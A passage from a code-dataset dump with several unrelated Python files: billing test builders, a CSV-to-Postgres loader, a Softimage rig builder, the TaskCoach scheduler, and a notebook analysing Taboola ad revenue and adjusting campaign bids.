seq\n\n\ndef set_roles(session, passport=None, roles=None):\n roles = roles or []\n passport = passport or session.passport\n\n with mock.patch('butils.passport.passport_admsubscribe'): # не ходим в апи паспорта\n passport.set_roles(roles)\n\n # Clean up permissions cache\n def delattr_safe(o, name):\n if hasattr(o, name):\n delattr(o, name)\n\n delattr_safe(passport, '_perms_cache')\n delattr_safe(session, 'oper_perms')\n\n\ndef set_repr_client(session, passport, client):\n RoleClientPassportBuilder.construct(\n session,\n passport=passport,\n client=client,\n )\n session.flush()\n\n\nclass BadDebtActBuilder(ObjectBuilder):\n _class = mapper.BadDebtAct\n\n def prepare(self, **kwargs):\n self.b.act = kwargs['act']\n self.b.oper_uid = None\n self.b.commentary = None\n self.b.our_fault = False\n\n super(BadDebtActBuilder, self).prepare(**kwargs)\n\n\nclass YTLogLoadTypeBuilder(ObjectBuilder):\n _class = mapper.YtLogLoadType\n _generate_id = True\n\n def prepare(self, **kwargs):\n self.b.cc = kwargs.pop('cc', generate_character_string())\n self.b.table_name = kwargs.pop('table_name', 'bo.t_log_tariff_act_row')\n self.b.partition_col_name = kwargs.pop('partition_col_name', 'log_type_id')\n super(YTLogLoadTypeBuilder, self).prepare(**kwargs)\n\n\nclass YTLogLoadTaskBuilder(ObjectBuilder):\n _class = mapper.YtLogLoadTask\n\n def prepare(self, **kwargs):\n self.b.external_id = generate_character_string()\n self.b.task_type = kwargs.pop('task_type', YTLogLoadTypeBuilder())\n self.b.state = kwargs.pop('state', NirvanaProcessingTaskState.IN_PROGRESS)\n self.b.cluster_name = kwargs.pop('cluster_name', 'some_cluster')\n self.b.table_path = kwargs.pop('table_path', 'some_table')\n super(YTLogLoadTaskBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffTypeBuilder(ObjectBuilder):\n _class = mapper.LogTariffType\n\n def prepare(self, **kwargs):\n self.b.id = kwargs.pop('id', generate_character_string())\n super(LogTariffTypeBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffTaskBuilder(ObjectBuilder):\n _class = mapper.LogTariffTask\n\n def prepare(self, **kwargs):\n self.b.task_type = kwargs.pop('task_type', LogTariffTypeBuilder())\n self.b.metadata = kwargs.pop('metadata', {})\n self.b.state = NirvanaProcessingTaskState.IN_PROGRESS\n super(LogTariffTaskBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffOrderBuilder(ObjectBuilder):\n _class = mapper.LogTariffOrder\n\n def prepare(self, **kwargs):\n self.b.task = kwargs.pop('task', None) or LogTariffTaskBuilder()\n super(LogTariffOrderBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffConsumeBuilder(ObjectBuilder):\n _class = mapper.LogTariffConsume\n\n def prepare(self, **kwargs):\n self.b.consume_qty = kwargs.get('qty')\n self.b.consume_sum = kwargs.get('sum')\n super(LogTariffConsumeBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffMigrationOrderLoadBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationOrderLoad\n\n\nclass LogTariffMigrationOrderBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationOrder\n\n def prepare(self, order, **kwargs):\n self.b.task = kwargs.pop('task', LogTariffTaskBuilder())\n self.b.service_id = order.service_id\n self.b.service_order_id = order.service_order_id\n super(LogTariffMigrationOrderBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffMigrationInputBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationInput\n\n\nclass LogTariffMigrationUntariffedBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationUntariffed\n\n def prepare(self, order, **kwargs):\n self.b.task_id = kwargs.pop('task', LogTariffTaskBuilder()).id\n migration_order = kwargs.pop('migration_order', LogTariffMigrationOrderBuilder(order=order))\n self.b.migration_order = migration_order\n self.b.service_id = order.service_id\n self.b.service_order_id = order.service_order_id\n self.b.tariff_dt = kwargs.pop('tariff_dt', datetime.datetime.now())\n self.b.product_id = order.service_code\n self.b.overcompletion_qty = kwargs.pop('overcompletion_qty', 0)\n super(LogTariffMigrationUntariffedBuilder, self).prepare(**kwargs)\n\n\nclass LogTariffMigrationConsumeBuilder(ObjectBuilder):\n _class = mapper.LogTariffMigrationConsume\n\n def prepare(self, consume, **kwargs):\n self.b.task_id = kwargs.pop('task', LogTariffTaskBuilder()).id\n self.b.consume_id = consume.id\n order = consume.order\n self.b.service_id = order.service_id\n self.b.service_order_id = order.service_order_id\n self.b.migration_order = kwargs.pop('migration_order', LogTariffMigrationOrderBuilder(order=order))\n self.b.tariff_dt = kwargs.pop('tariff_dt', datetime.datetime.now())\n self.b.qty = kwargs.pop('qty', 0)\n self.b.sum = kwargs.pop('sum', 0)\n self.b.consume_qty = kwargs.pop('consume_qty', 0)\n self.b.consume_sum = kwargs.pop('consume_sum', 0)\n super(LogTariffMigrationConsumeBuilder, self).prepare(**kwargs)\n\n\nclass DailyActRequestBuilder(ObjectBuilder):\n _class = mapper.DailyActRequest\n\n\nclass ContractPrintFormRuleBuilder(ObjectBuilder):\n _class = mapper.ContractPrintFormRules\n\n\nclass FPSBankBuilder(ObjectBuilder):\n _class = mapper.FPSBank\n\n\nclass IsoCurrencyRateBuilder(ObjectBuilder):\n _class = mapper.IsoCurrencyRate\n\n def prepare(self, **kwargs):\n self.b.id = kwargs.pop('rate_id')\n self.b.src_cc = kwargs.pop('src_cc')\n self.b.dt = kwargs.pop('dt')\n self.b.iso_currency_from = kwargs.pop('iso_currency_from')\n self.b.rate_from = kwargs.pop('rate_from')\n self.b.iso_currency_to = kwargs.pop('iso_currency_to')\n self.b.rate_to = kwargs.pop('rate_to')\n super(IsoCurrencyRateBuilder, self).prepare(**kwargs)\n\n\nclass ReconciliationRequestBuilder(ObjectBuilder):\n _class = mapper.ReconciliationRequest\n\n def prepare(self, **kwargs):\n now = datetime.datetime.now()\n self.b.external_id = kwargs.pop('external_id', 'super-reconciliation-id-%s' % get_big_number())\n self.b.dt_from = ut.trunc_date(now - datetime.timedelta(days=30))\n self.b.dt_to = ut.trunc_date(now)\n self.b.dt = now\n self.b.status = 'NEW'\n super(ReconciliationRequestBuilder, self).prepare(**kwargs)\n\n def build(self, session):\n if self.b.get('client') is None:\n self.b.client = ClientBuilder.construct(session)\n\n if self.b.get('person') is None:\n self.b.person = PersonBuilder.construct(session, client=self.b.client, type='ur')\n\n if (self.b.get('firm') or self.b.get('firm_id')) is None:\n firm = FirmBuilder.construct(session)\n oebs_org_id = get_big_number()\n session.execute(\n '''insert into bo.t_firm_export (firm_id, export_type, oebs_org_id) values (:firm_id, 'OEBS', :oebs_org_id)''',\n {'firm_id': firm.id, 'oebs_org_id': oebs_org_id},\n )\n self.b.firm = firm\n\n return super(ReconciliationRequestBuilder, self).build(session)\n\n\nclass NirvanaTaskTypeBuilder(ObjectBuilder):\n _class = mapper.NirvanaTaskType\n\n def prepare(self, **kwargs):\n self.b.id = kwargs.pop('id', generate_character_string())\n super(NirvanaTaskTypeBuilder, self).prepare(**kwargs)\n\n\nclass NirvanaTaskBuilder(ObjectBuilder):\n _class = mapper.NirvanaTask\n\n def prepare(self, **kwargs):\n self.b.task_type = kwargs.pop('task_type', NirvanaTaskTypeBuilder())\n self.b.metadata = kwargs.pop('metadata', None)\n self.b.state = NirvanaProcessingTaskState.NEW\n super(NirvanaTaskBuilder, self).prepare(**kwargs)\n\n\nclass NirvanaTaskItemBuilder(ObjectBuilder):\n _class = mapper.NirvanaTaskItem\n\n def prepare(self, **kwargs):\n self.b.task = kwargs.pop('task', NirvanaTaskBuilder())\n self.b.metadata = kwargs.pop('metadata', None)\n self.b.output = kwargs.pop('output', None)\n self.b.processed = 0\n super(NirvanaTaskItemBuilder, self).prepare(**kwargs)\n\n\ndef create_brand(session, dt2clients, finish_dt=None, brand_type=7):\n from_dt, clients = dt2clients[0]\n main_client = next(iter(clients))\n contract = ContractBuilder(\n client=main_client,\n person=None,\n commission=ContractTypeId.ADVERTISING_BRAND,\n firm=FirmId.YANDEX_OOO,\n dt=ut.trunc_date(from_dt),\n payment_type=None,\n brand_type=brand_type,\n brand_clients={cl.id: 1 for cl in clients}\n ).build(session).obj\n\n col_type = mapper.contract_meta.collateral_types['GENERAL'][1026]\n col = contract.col0\n for from_dt, clients in dt2clients[1:]:\n col = contract.append_collateral(\n ut.trunc_date(from_dt),\n col_type,\n is_signed=from_dt,\n brand_clients={cl.id: 1 for cl in clients}\n )\n col.finish_dt = finish_dt and ut.trunc_date(finish_dt)\n session.flush()\n\n return contract\n\n\ndef add_dynamic_discount(consume, dynamic_discount_pct):\n consume.consume_qty = ut.round(ut.radd_percent(consume.consume_qty, -dynamic_discount_pct), 6)\n delta_qty = ut.round(ut.radd_percent(consume.current_qty, -dynamic_discount_pct), 6) - consume.current_qty\n consume.current_qty += delta_qty\n consume.order.consume_qty += delta_qty\n consume.order.dynamic_bonus_qty = delta_qty\n\n consume.completion_sum = ut.round00(ut.add_percent(consume.completion_qty * 30, -dynamic_discount_pct))\n consume.discount_pct = ut.round00(ut.mul_discounts(consume.discount_pct, dynamic_discount_pct))\n consume.session.flush()\n\n\n@contextlib.contextmanager\ndef patched_currency(dts_rates):\n def _extract_dt_rate(dt_rates):\n if isinstance(dt_rates, (list, tuple)):\n from_dt, rates = dt_rates\n else:\n from_dt = datetime.datetime(1980, 1, 1)\n rates = dt_rates\n return from_dt, rates\n\n def _patched(session, iso_cc, dat, *args, **kwargs):\n prev_dt, prev_rates = _extract_dt_rate(dts_rates[0])\n for dt_rates in dts_rates[1:] + [(datetime.datetime(3000, 1, 1), {})]:\n cur_dt, rates = _extract_dt_rate(dt_rates)\n if prev_dt <= dat < cur_dt:\n return ut.Struct(rate=prev_rates[iso_cc])\n else:\n prev_dt, prev_rates = cur_dt, rates\n\n patcher_real = mock.patch(\n 'balance.mapper.common.CurrencyRate.get_real_currency_rate_by_date',\n staticmethod(_patched)\n )\n patcher = mock.patch(\n 'balance.mapper.common.CurrencyRate.get_currency_rate_by_date',\n staticmethod(_patched)\n )\n with patcher, patcher_real:\n yield\n\n\nclass NDSOperationCodeBuilder(ObjectBuilder):\n _class = mapper.NDSOperationCode\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/tests/object_builder.py","file_name":"object_builder.py","file_ext":"py","file_size_in_byte":84685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37109026777","text":"import glob\nfrom dotenv import load_dotenv\nimport os\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nload_dotenv()\n\n\nengine = create_engine(f\"postgresql://{os.getenv('DB_STRING')}\")\n\nengine.execute(\"\"\"\n CREATE SCHEMA IF NOT EXISTS ecommerce\n \"\"\")\n\nfilenames = glob.glob('*.csv')\nfor filename in filenames:\n dataset_name = filename.split('_dataset')[0]\n dataset = pd.read_csv(filename)\n dataset.to_sql(\n name=dataset_name, con=engine, schema=\"ecommerce\", if_exists=\"replace\"\n )\n print(f'SUCCEED: {filename} -> {dataset_name}')","repo_name":"mebaysan/Modern-Data-Architecture","sub_path":"Source/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"1585053559","text":"from cmivfx import xsi, log\r\nfrom datetime import datetime\r\n\r\n\r\nclass BuilderHooks(object):\r\n\r\n \"\"\"\r\n Builder takes guide model and creates a 'rig' model from the parameters specified in the guide.\r\n Rig model contains all rig elements - components, groups, geometry etc.\r\n Builder needs to be instantiated with instance of guide module.\r\n \"\"\"\r\n\r\n def __init__(self, guide):\r\n self.guide = guide\r\n self.settings = self.guide.settings\r\n self.components = {} # dictionary of components to be built\r\n\r\n def build(self):\r\n \"\"\"Master call for building rig elements. Logs completion time for convenience.\"\"\"\r\n startTime = datetime.now()\r\n\r\n xsi.SetValue('preferences.scripting.cmdlog', False, '')\r\n self.buildInitialHierarchy()\r\n self.initComponents()\r\n self.buildComponents()\r\n xsi.SetValue('preferences.scripting.cmdlog', True, '')\r\n\r\n endTime = datetime.now()\r\n log('Build completed in: {}'.format(endTime - startTime))\r\n\r\n def buildInitialHierarchy(self):\r\n \"\"\"\"Creates default rig model hierarchy for organising rig components.\"\"\"\r\n # Rig model (different from guide model)\r\n self.model = xsi.ActiveSceneRoot.AddModel(None, self.settings['Name'])\r\n self.model.Properties('Visibility').Parameters('viewvis').Value = False\r\n\r\n # Groups for organisation\r\n self.hiddenGrp = self.model.AddGroup(None, 'hidden_grp')\r\n self.unselactableGrp = self.model.AddGroup(None, 'unselactable_grp')\r\n self.controllersGrp = self.model.AddGroup(None, 'controllers_grp')\r\n self.deformersGrp = self.model.AddGroup(None, 'deformers_grp')\r\n\r\n self.hiddenGrp.Parameters('viewvis').Value = 0\r\n self.unselactableGrp.Parameters('selectability').Value = 0\r\n self.deformersGrp.Parameters('viewvis').Value = 0\r\n\r\n # Nulls for organisation\r\n self.deformersOrg = self.model.AddNull('deformers_org')\r\n self.geometryOrg = self.model.AddNull('geometry_org')\r\n self.hiddenGrp.AddMember(self.deformersOrg)\r\n self.hiddenGrp.AddMember(self.geometryOrg)\r\n\r\n def initComponents(self):\r\n \"\"\"\r\n For each component collected by the guide, store the component build class in a dictionary.\r\n \"\"\"\r\n for key, guide in self.guide.components.items():\r\n type_ = guide.type_ # e.g. arm, godnode\r\n log(\"init component builder: '{}'. Component type is '{}'\".format(key, type_))\r\n\r\n moduleName = type_.lower()\r\n module = __import__('cmivfx.components.{}'.format(moduleName), globals(), locals(), ['object'], -1)\r\n ComponentClass = getattr(module, type_) # e.g. cmivfx.components.fkctrl.FkCtrl\r\n\r\n self.components[key] = ComponentClass(self, guide)\r\n\r\n def buildComponents(self):\r\n \"\"\"\r\n Execute each hook for each component in succession - createObjects() for all components,\r\n then createParameters() for all components etc.\r\n \"\"\"\r\n for i in range(5):\r\n for key, component in self.components.items():\r\n component.build[i]()\r\n\r\n","repo_name":"lachyb/softimagePythonRigging","sub_path":"pythonLib/cmivfx/builder/builderHooks.py","file_name":"builderHooks.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18747116454","text":"from taskcoachlib import patterns\nfrom taskcoachlib.thirdparty import apscheduler\nimport dateandtime\nimport logging\nimport timedelta\nimport wx\nimport weakref\n\n\nclass ScheduledMethod(object):\n def __init__(self, method):\n self.__func = method.im_func\n self.__self = weakref.ref(method.im_self)\n\n def __eq__(self, other):\n return self.__func is other.__func and self.__self() is other.__self()\n\n def __hash__(self):\n return hash(self.__dict__['_ScheduledMethod__func'])\n\n def __call__(self, *args, **kwargs):\n obj = self.__self()\n if obj is None:\n try:\n Scheduler().unschedule(self)\n except KeyError:\n pass\n else:\n self.__func(obj, *args, **kwargs)\n\n\nclass Scheduler(apscheduler.scheduler.Scheduler):\n __metaclass__ = patterns.Singleton\n \n def __init__(self, *args, **kwargs):\n self.__handler = self.createLogHandler()\n super(Scheduler, self).__init__(*args, **kwargs)\n self.__jobs = {}\n self.start()\n \n def createLogHandler(self):\n # apscheduler logs, but doesn't provide a default handler itself, make it happy:\n schedulerLogger = logging.getLogger('taskcoachlib.thirdparty.apscheduler.scheduler')\n try:\n handler = logging.NullHandler()\n except AttributeError:\n # NullHandler is new in Python 2.7, log to stderr if not available\n handler = logging.StreamHandler()\n schedulerLogger.addHandler(handler)\n return handler\n\n def removeLogHandler(self):\n # accumulation of handlers in the unit/language/etc tests makes them *slow*\n schedulerLogger = logging.getLogger('taskcoachlib.thirdparty.apscheduler.scheduler')\n schedulerLogger.removeHandler(self.__handler)\n\n def shutdown(self, wait=True, shutdown_threadpool=True):\n super(Scheduler, self).shutdown(wait=wait, \n shutdown_threadpool=shutdown_threadpool)\n self.removeLogHandler()\n\n def schedule(self, function, dateTime):\n proxy = ScheduledMethod(function)\n def callback():\n if proxy in self.__jobs:\n del self.__jobs[proxy]\n wx.CallAfter(proxy)\n\n if dateTime <= dateandtime.Now() + timedelta.TimeDelta(milliseconds=500):\n callback()\n else:\n self.__jobs[proxy] = job = self.add_date_job(callback, dateTime, misfire_grace_time=0)\n return job\n\n def schedule_interval(self, function, days=0, minutes=0, seconds=0):\n proxy = ScheduledMethod(function)\n def callback():\n wx.CallAfter(proxy)\n \n if proxy not in self.__jobs:\n start_date = dateandtime.Now().endOfDay() if days > 0 else None\n self.__jobs[proxy] = job = self.add_interval_job(callback, days=days, \n minutes=minutes, seconds=seconds, start_date=start_date, misfire_grace_time=0,\n coalesce=True)\n return job\n\n def unschedule(self, function):\n proxy = function if isinstance(function, ScheduledMethod) else ScheduledMethod(function)\n if proxy in self.__jobs:\n try:\n self.unschedule_job(self.__jobs[proxy])\n except KeyError:\n pass\n del self.__jobs[proxy]\n\n def is_scheduled(self, function):\n return ScheduledMethod(function) in self.__jobs\n","repo_name":"TaskEvolution/Task-Coach-Evolution","sub_path":"taskcoach/taskcoachlib/domain/date/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"21490294977","text":"#%%\nfrom utils.env import load_env_from_aws\nload_env_from_aws()\n\nimport importlib\nimport datetime\nimport itertools\nimport collections\nimport pprint\nimport sys\nimport re\nimport os\n\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom IPython.display import display as ipydisp\n\nfrom notebooks.aduriseti_shared.utils import *\nfrom models.utils import wavg, get_wavg_by, wstd\n\nfrom models.taboola.common import *\nfrom models.taboola.utils import *\n\nstart_date = TODAY - 90*DAY\neval_date = TODAY - 30*DAY\nend_date = TODAY\n\nsplit_cols = [\"state\", \"device\", \"keyword\"]\nrps_df = agg_rps(start_date, end_date, None, traffic_source=TABOOLA,\n agg_columns=tuple([\"campaign_id\", *split_cols, \"utc_dt\"]))\nrps_df = translate_taboola_vals(rps_df)\nrps_df = rps_df_postprocess(rps_df)\nrps_df_bkp = rps_df.copy()\n#%%\nrps_df = rps_df_bkp.copy()\nrps_df = rps_df.reset_index()\nfitI = rps_df['utc_dt'].dt.date < eval_date\nfitI.index = rps_df.index\n\nimport models.taboola.utils\nimportlib.reload(models.taboola.utils)\n# TaboolaRPSEst = models.taboola.utils.TaboolaRPSEst\nclusterer = TaboolaRPSEst(clusts=None,enc_min_cnt=10).fit(\n rps_df[fitI].set_index([*split_cols, \"utc_dt\"]), None)\nrps_df.loc[fitI, \"clust\"] = clusterer.transform(\n rps_df[fitI].set_index([*split_cols, \"utc_dt\"]))\nrps_df.loc[~fitI, \"clust\"] = clusterer.transform(\n rps_df[~fitI].set_index([*split_cols, \"utc_dt\"]))\nrps_df[\"clust\"] = rps_df[\"clust\"].fillna(-1)\n\n#%%\nself = clusterer\nX = rps_df.set_index([*split_cols, \"utc_dt\"])\nXdf = X\nassert X.index.names[-1] == \"utc_dt\"\nX = X .reset_index()[X.index.names].iloc[:, :-1]\nX = self.enc_1hot.transform(X)\nprint(\"|X|\", X.shape)\nP = clusterer.clf.decision_path(X)\n#%%\nPdf = pd.DataFrame(P.todense(),index=Xdf.index)\nrevenue_Pdf = Pdf * Xdf[[\"revenue\"]].values\nsession_Pdf = Pdf * Xdf[[\"sessions\"]].values\nleads_Pdf = Pdf * Xdf[[\"leads\"]].values.astype(int)\nrevenue_agg_Pdf = Pdf * revenue_Pdf.groupby(\"utc_dt\").transform(sum)\nsession_agg_Pdf = Pdf * session_Pdf.groupby(\"utc_dt\").transform(sum)\nleads_agg_Pdf = Pdf * leads_Pdf.groupby(\"utc_dt\").transform(sum)\n\nSAMPLE_THRESH = 100\nI = (~(session_agg_Pdf < SAMPLE_THRESH)).iloc[:,::-1].idxmax(axis=1)\nI = np.eye(self.clf.tree_.node_count).astype(bool)[I]\n\nrev_rollup = (revenue_agg_Pdf * I).sum(axis=1)\nsess_rollup = (session_agg_Pdf * I).sum(axis=1)\nrps_rollup = rev_rollup / sess_rollup\nrps_rollup\n#%%\nrev_rollup\n#%%\nsess_rollup\n#%%\ndef running_suffix_max(df):\n df_running_max = df.copy()\n H, W = df_running_max.shape\n for ci in reversed(range(W-1)):\n df_running_max.iloc[:, ci] = np.maximum(\n df_running_max.iloc[:, ci], df_running_max.iloc[:, ci+1])\n return df_running_max\n\nrevenue_contrib_Pdf = revenue_agg_Pdf - running_suffix_max(revenue_agg_Pdf).shift(-1,axis=1).fillna(0)\nsession_contrib_Pdf = session_agg_Pdf - running_suffix_max(session_agg_Pdf).shift(-1,axis=1).fillna(0)\nleads_contrib_Pdf = leads_agg_Pdf - running_suffix_max(leads_agg_Pdf).shift(-1,axis=1).fillna(0)\nrevenue_contrib_Pdf = np.maximum(0,revenue_contrib_Pdf)\nsession_contrib_Pdf = np.maximum(0,session_contrib_Pdf)\nleads_contrib_Pdf = np.maximum(0,leads_contrib_Pdf)\n\n\"\"\"\ntotal_sess = 0\ntotal_rev = 0\nwhile total_sess < THRESH - scan up through decision tree path:\n rollup_factor = min(n.sessions,THRESH - total_sess) / n.sessions\n total_sess += n.sessions * rollup_factor\n total_rev += n.rev * rollup_factor\nROAS = total_rev / total_sess\n\"\"\"\nH,W = session_contrib_Pdf.shape\ntotal_sess = session_contrib_Pdf.iloc[:,-1]\ntotal_rev = revenue_contrib_Pdf.iloc[:,-1]\nimport tqdm\nfor ni in tqdm.tqdm(reversed(session_contrib_Pdf.columns[:-1])):\n n_sessions = session_contrib_Pdf.iloc[:, ni]\n n_revenue = revenue_contrib_Pdf.iloc[:,ni]\n rollup_factor = np.clip((SAMPLE_THRESH - total_sess) / n_sessions, 0, 1).fillna(0)\n total_sess += n_sessions * rollup_factor\n total_rev += n_revenue * rollup_factor \n\nXdf[\"rps_rollup\"] = total_rev / total_sess\nXdf[\"rps_rollup\"]\n#%%\ntotal_sess\n#%%\ntotal_rev\n#%%\ntotal_rev / total_sess\n#%%\n\"\"\"\nNOTE: dont actually think this owrks\nbest_path (n,):\n if n == NULL:\n return INF,NAN\n if n.date < lookback start:\n return INF,NAN\n else\n OPTS = [\n 1. rollup over time\n best_path_time_rollup = best_path(n-7*DAY)\n => MSE(*best_path_time_rollup,n)\n ->\n RPS(*best_path_time_rollup,n)\n 2. rollup over tree\n best_path_tree_rollup = best_path(n-7*DAY)\n => MSE(*best_path_tree_rollup,n)\n ->\n RPS(*best_path_tree_rollup,n)\n \n return total_rev + n.sessopn\n\"\"\"\n\"\"\"\nmetaparams = time decay \\alpha - heirarchy decay \\beta\nDP rollup:\n- define recursion as fn of:\n - node\n - date\n - sessions rolled up \n- IF sessions > SESS_THRESH: \n return [{\n sessions = 0\n revenue = 0\n }]\n- IF node == NULL\n return MSE == INF \n- IF date < lookback period\n return MSE == INF\n- ELSE:\n 1: try DP rollup at node parent `p` \n rollup1 = [* \\beta * DP_rollup(`p`,date,sessions+n.session),\n {sessions = n.sessions, revenue = n.revenue}]\n 2: for every node `m` in decision path downstream of `n` try rollup at `m` - 7*DAY\n rollup2_seq = [\n [ * \\alpha**7 * DP_rollup(`m`,date-7*DAY,sessions+n.sessions)\n {sessions = n.sessions, revenue = n.revenue}]\n for m in decision path\n ]\n return MIN([rollup1,*rollup2_seq], by = lambda rollup: MSE(rollup))\n\nbest_rollup = DP_rollup(decisoin path leaf `l`, TODAY, 0)\nRPS = sum(best_rollup.revenue) / sum(best_rollup.sessions)\n\"\"\"\n\"\"\"\n. . . . . . . \n\n. . . . . . .\n\n. . . . . . V\n\n. . . . . . < V\n ^ ^\n. . . . . V V\n\n\nBFS(ish) btd\n- 1 condition - we will not add a node to Q unless both its children have\n been visited - this is to maintain a \"staircase\" exploration pattern\nV = {}\nQ = [leaf] # \nwhile Q and TOTAL_SESS(V) < THRESH\n n = pop minimum n from Q by MSE(*V,n)\n V += n\n fringe = [n.parent for n in V] + [n-7*day for n in V] \n + bottom border + right border\n fringe -= V\n fringe = filter(fringe,n in fringe twice)\n fringe = fringe - Q\n Q += fringe\n\nreturn RPC(V)\n\n\"\"\"\n#%%\nleaf_indices = clusterer.clf.apply(X)\nDRC = [(1,r,li) for r,li in enumerate(leaf_indices)]\nD,R,C = zip(*DRC)\nimport scipy.sparse\nL = scipy.sparse.csr_matrix((D,(R,C)))\n#%%\nLdf = pd.DataFrame(L.todense(),index=Xdf.index).astype(int)\nrevenue_Ldf = Ldf * Xdf[[\"revenue\"]].values\nsession_Ldf = Ldf * Xdf[[\"sessions\"]].values\nleads_Ldf = Ldf * Xdf[[\"leads\"]].values.astype(int)\n#%%\nrevenue_Pdf.groupby(\"utc_dt\")\n#%%\nself.clf.tree_.children_left\n#%%\nself.clf.tree_.children_right\n#%%\nPdf\n#%%\nPdf * session_Pdf.groupby(\"utc_dt\").sum()\n\n#%%\nCRD_l = [(n,l,1) for n,l in enumerate(self.clf.tree_.children_left) if l > 0]\nCRD_r = [(n,r,1) for n,r in enumerate(self.clf.tree_.children_right) if r >= 0]\nC,R,D = zip(*[*CRD_l,*CRD_r])\nlen(C),len(R),len(D)\n\nimport scipy.sparse\n\nA_child = scipy.sparse.csr_matrix((D,(R,C))).todense()\nA_child\n# A_parent = scipy.sparse.csr_matrix()\n#%%\nrps_df[\"rps_clust\"] = rps_df \\\n .groupby([\"clust\", \"utc_dt\"])[\"rps\"].transform(get_wavg_by(rps_df, \"sessions\"))\ndaily_rps_mae = (rps_df[\"rps\"] - rps_df[\"rps_clust\"]).abs()\nassert abs(\n wavg(rps_df[\"rps_clust\"], rps_df[\"sessions\"]) -\n wavg(rps_df[\"rps\"], rps_df[\"sessions\"])) < 1e-10\n\nkpis_agg = [\"revenue\", \"sessions\", \"leads\"]\nkpis_session = [\"rps\", \"lps\"]\nkpis_lead = [\"rpl\"]\nclust_rps_df = rps_df[~fitI].groupby(\"clust\")[kpis_agg].sum()\nclust_rps_df[kpis_session] = rps_df[~fitI].groupby(\"clust\") \\\n .apply(lambda df: wavg(df[kpis_session], df['sessions']))\nclust_rps_df[kpis_lead] = rps_df[~fitI].groupby(\"clust\") \\\n .apply(lambda df: wavg(df[kpis_lead].fillna(0).values, df['leads']))\n# clust_rps_df[split_cols]\nclust_rps_df[\"rps_\"] = clust_rps_df[\"revenue\"] / clust_rps_df[\"sessions\"]\nclust_rps_df[\"rpl_\"] = clust_rps_df[\"revenue\"] / clust_rps_df['leads']\n# agg_rps_df = rps_df[~fitI].groupby(rps_df.index.names[:-1]).agg({\n# \"sessions\": sum,\n# \"rps\": get_wavg_by(rps_df[~fitI],\"sessions\")\n# })\nipydisp(clust_rps_df)\n# assert clust_rps_df[\"rps\"].max() <= agg_rps_df[\"rps\"].max()\n# rps_wavg = wavg(agg_rps_df[[\"rps\"]], agg_rps_df[\"sessions\"])\nrps_wavg = wavg(rps_df[~fitI][\"rps\"], rps_df[~fitI][\"sessions\"])\nrps_clust_wavg = wavg(clust_rps_df[[\"rps\"]], clust_rps_df[\"sessions\"])\nassert all((rps_wavg - rps_clust_wavg).abs()\n < 1e-3), (rps_wavg, rps_clust_wavg)\n\nperfd = {\n \"clusterer\": clusterer,\n # \"fit_shape\": agg_rps_df.shape,\n \"clust_shape\": clust_rps_df.shape,\n # \"split_variance\": wstd(agg_rps_df[\"rps\"], agg_rps_df[\"sessions\"]),\n \"cluster_variance\": wstd(clust_rps_df[\"rps\"], clust_rps_df[\"sessions\"]),\n # wstd(rps_df[\"rps_avg\"],rps_df[\"sessions\"])\n # \"clustered_split_factor\": get_split_factor(rps_df),\n \"rps_mae\": wavg(daily_rps_mae, rps_df[\"sessions\"]),\n}\npprint.pprint(perfd)\n#%%\nrps_df[\"rps_est\"] = clusterer.predict(rps_df.set_index([*split_cols,\"utc_dt\"]))\n\nrps_df_campaign = rps_df[rps_df[\"utc_dt\"].dt.date > TODAY - 7*DAY] \\\n .groupby([\"campaign_id\"])[[\"rps_est\"]] \\\n .agg(get_wavg_by(rps_df, \"sessions\"))\nrps_df_publisher = rps_df \\\n [rps_df[\"utc_dt\"].dt.date > TODAY - 7*DAY] \\\n .groupby([\"campaign_id\",\"keyword\"])[[\"rps_est\"]] \\\n .agg(get_wavg_by(rps_df, \"sessions\")) \\\n .unstack()\n#%%\nfrom pytaboola import TaboolaClient\nfrom pytaboola.services import AccountService,CampaignService,CampaignSummaryReport\n# d = CampaignSummaryReport(client, O65_ACCNT_ID).fetch(\n# dimension=\"campaign_day_breakdown\",start_date=TODAY-7*DAY, end_date=TODAY)\n# import jmespath\n# jmespath.search(\"results[?cpc > `0`].{cpc: cpc,campaign_id: campaign, utc_dt: date}\",d)\n\nclient = TaboolaClient(**TABOOLA_HC_CREDS)\nacct_service = AccountService(client)\naccnts = acct_service.list()[\"results\"]\nid2accnt = {a[\"account_id\"]: a for a in accnts}\n\ncamps = []\nfor aid in [TEST_ACCNT_ID,O65_ACCNT_ID]:\n camp_service = CampaignService(client, aid)\n camps += camp_service.list()\n\ncampdf = pd.DataFrame([flatten_camp(camp) for camp in camps])\ncampdf = campdf.set_index((\"attrs\", \"id\"))\ncampdf.columns = pd.MultiIndex.from_tuples(campdf.columns)\nprint(\"|campdf|\", campdf.shape)\n\nprint(\"campaign df sparsity:\",((campdf == 0) | campdf.isna()).sum().sum() / np.prod(campdf.shape))\nstrC = campdf.dtypes[campdf.dtypes == object].index\nfloatC = campdf.dtypes[campdf.dtypes == np.float64].index\n\n# campdf = campdf.reindex({*campdf.index,*active_camps})\nactive_camps = {*active_camps} & {*campdf.index}\nactive_camps\n#%%\ncpc_df_campaign_new = np.clip(\n rps_df_campaign[\"rps_est\"].reindex(active_camps) / ROI_TARGET,\n (1-MAX_CUT)*campdf[\"attrs\"].loc[active_camps,\"cpc\"],\n 